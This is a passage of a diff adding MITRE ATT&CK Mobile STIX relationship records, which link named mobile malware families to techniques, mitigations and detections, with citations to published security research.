"url": "http://arstechnica.com/security/2017/01/virulent-android-malware-returns-gets-2-million-downloads-on-google-play/", + "description": "Dan Goodin. (2017, January 23). Virulent Android malware returns, gets >2 million downloads on Google Play. Retrieved January 24, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[HummingWhale](https://attack.mitre.org/software/S0321) generates revenue by displaying fraudulent ads and automatically installing apps. When victims try to close the ads, [HummingWhale](https://attack.mitre.org/software/S0321) runs in a virtual machine, creating a fake ID that allows the perpetrators to generate revenue.(Citation: ArsTechnica-HummingWhale)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--6447e3a1-ef4d-44b1-99d5-6b1c4888674f", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a7cc0168-247d-4a6d-b6f4-d5a04f99216c", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2018-10-17T00:14:20.652Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--b928b94a-4966-4e2a-9e61-36505b896ebc", + "target_ref": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5a6df1dd-9aa4-4f67-9195-8c3a9f5c0f7a", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Tripwire-MazarBOT", + "url": "https://www.tripwire.com/state-of-security/security-data-protection/android-malware-sms/", + "description": "Graham Cluley. (2016, February 16). Android users warned of malware attack spreading via SMS. Retrieved December 23, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[MazarBOT](https://attack.mitre.org/software/S0303) can send messages to premium-rate numbers.(Citation: Tripwire-MazarBOT)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--5ddf81ea-2c06-497b-8c30-5f1ab89a40f9", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--20dcd886-56c4-421d-ba36-0f37a47a3f86", + "created": "2022-04-06T13:55:37.498Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be advised that applications generally do not require permission to send SMS messages.", + "modified": "2022-04-06T13:55:37.498Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5a036fb8-9f72-4383-91c5-0f47b33b2c9d", + "created": "2019-07-10T15:35:43.658Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:57:40.371Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) gathers and exfiltrates data about nearby Wi-Fi access points.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--dd818ea5-adf5-41c7-93b5-f3b839a219fb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--433ba5b0-76eb-49e1-a2ed-e54994e94041", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "modified": "2019-10-10T15:27:22.174Z", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) contains functionality to gather cellular IDs.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--15d83ba8-be89-4151-9c6e-35d14df4fa80", + "created": "2022-03-30T19:33:05.375Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates typically provide patches for vulnerabilities that enable device rooting.", + "modified": "2022-03-30T19:33:05.375Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7850d933-120b-4ae6-998d-8dc4dfd6d164", + "type": "relationship", + "created": "2020-01-27T17:49:05.664Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-01-27T17:49:05.664Z", + "description": "(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "intrusion-set--049cef3b-22d5-4be6-b50c-9839c7a34fdd", + "target_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0ae94053-1963-45ba-a3a9-62e508281c8e", + "created": "2023-01-19T18:06:36.986Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "trendmicro_tianyspy_0122", + "description": "Trend Micro. (2022, January 25). TianySpy Malware Uses Smishing Disguised as Message From Telco. Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:21:58.318Z", + "description": "[TianySpy](https://attack.mitre.org/software/S1056) can install malicious configurations on iPhones to allow malware to be installed via Ad Hoc distribution.(Citation: trendmicro_tianyspy_0122) ", + "relationship_type": "uses", + "source_ref": "malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7696b512-ba2f-4310-86e1-7c528529fc5e", + "type": "relationship", + "created": "2020-09-15T15:18:12.425Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020." + } + ], + "modified": "2020-09-15T15:18:12.425Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) stores its malicious code in encrypted asset files that are decrypted at runtime. Newer versions of [FakeSpy](https://attack.mitre.org/software/S0509) encrypt the C2 address.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5107be8a-b5fc-4442-af0d-2c92e086a912", + "type": "relationship", + "created": "2020-05-11T16:13:43.062Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CheckPoint Agent Smith", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020." + } + ], + "modified": "2020-05-11T16:13:43.062Z", + "description": "[Agent Smith](https://attack.mitre.org/software/S0440) checks if a targeted application is running in user-space prior to infection.(Citation: CheckPoint Agent Smith) ", + "relationship_type": "uses", + "source_ref": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--18afa4ad-4fd7-47ad-acdb-3b298b640d3c", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Adware", + "description": "Michael Bentley. (2015, November 4). Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire. Retrieved December 21, 2016.", + "url": "https://blog.lookout.com/blog/2015/11/04/trojanized-adware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:26:05.199Z", + "description": "[ShiftyBug](https://attack.mitre.org/software/S0294) is auto-rooting adware that embeds itself as a system application, making it nearly impossible to remove.(Citation: Lookout-Adware)", + "relationship_type": "uses", + "source_ref": "malware--c80a6bef-b3ce-44d0-b113-946e93124898", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6b74d347-4d28-401f-9ac2-b3e1c9428bab", + "created": "2023-01-18T19:16:15.534Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:54:10.458Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can use keylogging to steal user banking credentials.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4e6b726d-9ef4-4eb6-b9a7-74059caee5b7", + "created": "2020-07-20T13:27:33.440Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020.", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:26:22.984Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can collect SMS messages.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--eb052029-e1c9-4f24-8594-299aaec7f1df", + "created": "2020-12-14T14:52:03.351Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020.", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:42:46.952Z", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) can collect the device’s call log.(Citation: Sophos Red Alert 2.0)", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--67aa692c-24e4-483e-996e-02ce1e861ec8", + "created": "2023-02-28T20:37:29.206Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T22:09:02.129Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can add display overlays onto banking apps to capture credit card information.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--592331d2-60a7-4264-b844-fbeb89b6386c", + "created": "2023-03-20T18:58:56.942Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:58:56.942Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--09c55c29-ce4f-4d3e-a940-f3a4b6f07bca", + "created": "2022-04-06T13:22:57.754Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T13:22:57.754Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--37047267-3e56-453c-833e-d92b68118120", + "target_ref": "attack-pattern--3e091a89-a493-4a6c-8e88-d57be19bb98d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--af55d12a-5f58-4135-90d0-f465a66f7a3f", + "type": "relationship", + "created": "2020-07-15T20:20:59.305Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "modified": "2020-07-15T20:20:59.305Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) abuses the accessibility service to prevent removing administrator permissions, accessibility permissions, and to set itself as the default SMS handler.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--554ec347-c8b2-43da-876b-36608dcc543d", + "created": "2017-10-25T14:48:53.746Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "TelephonyManager", + "url": "https://developer.android.com/reference/android/telephony/TelephonyManager.html", + "description": "Android. (n.d.). TelephonyManager. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 10 introduced changes that prevent normal applications from accessing sensitive device identifiers.(Citation: TelephonyManager) ", + "modified": "2022-03-30T21:04:59.921Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cd503879-ccb4-4d47-af5a-90fe7e37c438", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "PaloAlto-SpyDealer", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:53:53.384Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) harvests contact lists from victims.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4aec0738-2c76-4dc7-af8a-87785e658193", + "created": "2021-10-01T14:42:49.152Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021.", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:26:18.801Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can run shell commands.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3e2474d3-f36d-4193-92f6-273296befdd3", + "created": "2022-04-05T19:38:18.760Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should protect their account credentials and enable multi-factor authentication options when available. ", + "modified": "2022-04-05T19:38:18.760Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--9ef05e3d-52db-4c12-be4f-519214bbe91f", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0a737289-c62d-4c0a-a857-6d116f774864", + "type": "relationship", + "created": "2020-06-26T15:12:40.077Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ESET DEFENSOR ID", + "url": "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/", + "description": "L. Stefanko. (2020, May 22). Insidious Android malware gives up all malicious features but one to gain stealth. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T15:12:40.077Z", + "description": "[DEFENSOR ID](https://attack.mitre.org/software/S0479) can abuse the accessibility service to read any text displayed on the screen.(Citation: ESET DEFENSOR ID)", + "relationship_type": "uses", + "source_ref": "malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1e286a4a-63cd-47df-a034-11a5d92daceb", + "created": "2022-04-06T15:41:03.981Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T15:41:03.981Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--986f80f7-ff0e-4f48-87bd-0394814bbce5", + "target_ref": "attack-pattern--c6a146ae-9c63-4606-97ff-e261e76e8380", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6846dc09-b66a-42d3-aea2-c80b51f22952", + "created": "2023-02-28T21:42:31.008Z", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T21:42:31.008Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can record audio using the device microphone.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4b3cfd7c-5e41-4d9e-8879-b126ba66eaf1", + "created": "2021-10-01T14:42:49.176Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can collect every user screen tap and compare the input to a hardcoded list of coordinates to translate the input to a character.(Citation: SecureList BusyGasper)", + "modified": "2022-04-15T17:33:49.565Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2f9b95b2-0ef4-40b8-a230-86f273000dc7", + "created": "2023-03-15T16:26:04.949Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-15T16:26:04.949Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + 